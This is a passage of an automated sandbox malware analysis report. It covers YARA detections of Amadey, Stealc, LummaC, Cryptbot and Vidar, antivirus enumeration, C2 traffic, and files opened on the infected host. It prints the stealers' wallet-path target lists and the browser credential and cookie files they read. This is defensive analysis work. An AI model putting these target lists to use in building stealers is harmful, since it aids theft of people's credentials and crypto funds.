                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Protocol VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeQueries volume information: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe VolumeInformation
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeCode function: 0_2_00A8CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00A8CB1A
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006961F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,8_2_006961F0
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006CEB9F _free,GetTimeZoneInformation,8_2_006CEB9F
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006993D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,8_2_006993D0
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: procmon.exe
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: wireshark.exe
                                  Source: legs.exe, 0000000A.00000003.2556017634.0000000001393000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2559643651.0000000001393000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2554472035.0000000001393000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2516799118.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2510386277.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2510421518.0000000001393000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2596814803.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2597000774.0000000005C26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected Amadey
                                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                  Yara detected Amadeys Clipper DLL
                                  Source: Yara matchFile source: 9.0.defnur.exe.dd0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 35.2.defnur.exe.dd0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.am209.exe.690000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.0.am209.exe.690000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.defnur.exe.dd0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 35.0.defnur.exe.dd0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exe, type: DROPPED
                                  Yara detected Amadeys stealer DLL
                                  Source: Yara matchFile source: 5.2.axplong.exe.670000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 27.2.834ad20df2.exe.630000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.ebjtOH70jl.exe.a70000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 28.2.skotes.exe.9a0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 29.2.skotes.exe.9a0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.2.axplong.exe.670000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001C.00000002.2921135605.00000000009A1000.00000040.00000001.01000000.00000040.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001B.00000002.2866355252.0000000000631000.00000040.00000001.01000000.0000003F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001D.00000002.2925964094.00000000009A1000.00000040.00000001.01000000.00000040.sdmp, type: MEMORY
                                  Yara detected Cryptbot
                                  Source: Yara matchFile source: Process Memory Space: liddad.exe PID: 6452, type: MEMORYSTR
                                  Yara detected LummaC Stealer
                                  Source: Yara matchFile source: Process Memory Space: gold1111111111.exe PID: 7144, type: MEMORYSTR
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: Process Memory Space: legs.exe PID: 6408, type: MEMORYSTR
                                  Yara detected Stealc
                                  Source: Yara matchFile source: 11.0.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 33.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 26.2.0d261d49cf.exe.b60000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000000.2396771733.00000000007BB000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000002.2966877461.0000000000B61000.00000040.00000001.01000000.0000003E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001A.00000002.2982325237.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.2605307316.00000000007BB000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000021.00000002.2973274370.0000000000B61000.00000040.00000001.01000000.0000003E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: stealc_valenciga.exe PID: 6128, type: MEMORYSTR
                                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe, type: DROPPED
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Yara detected Vidar stealer
                                  Source: Yara matchFile source: Process Memory Space: stealc_valenciga.exe PID: 6128, type: MEMORYSTR
                                  Found many strings related to Crypto-Wallets (likely being stolen)
                                  Source: legs.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
                                  Source: legs.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*.*;%
                                  Source: legs.exeString found in binary or memory: Jaxx Liberty
                                  Source: legs.exe, 0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.conf.json
                                  Source: legs.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco*i%
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.000000000085C000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.000000000085C000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.000000000085C000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                  Source: legs.exeString found in binary or memory: ExodusWeb3
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonYk
                                  Source: legs.exe, 0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*8h7
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco*i%
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet(k'
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
                                  Source: legs.exe, 0000000A.00000003.2497430762.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.000000000085C000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                  Leaks process information
                                  Source: global trafficTCP traffic: 192.168.2.4:49993 -> 34.147.147.173:80
                                  Source: global trafficTCP traffic: 192.168.2.4:50092 -> 34.147.147.173:80
                                  Tries to harvest and steal Bitcoin Wallet information
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                                  Tries to harvest and steal browser information (history, passwords, etc)
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
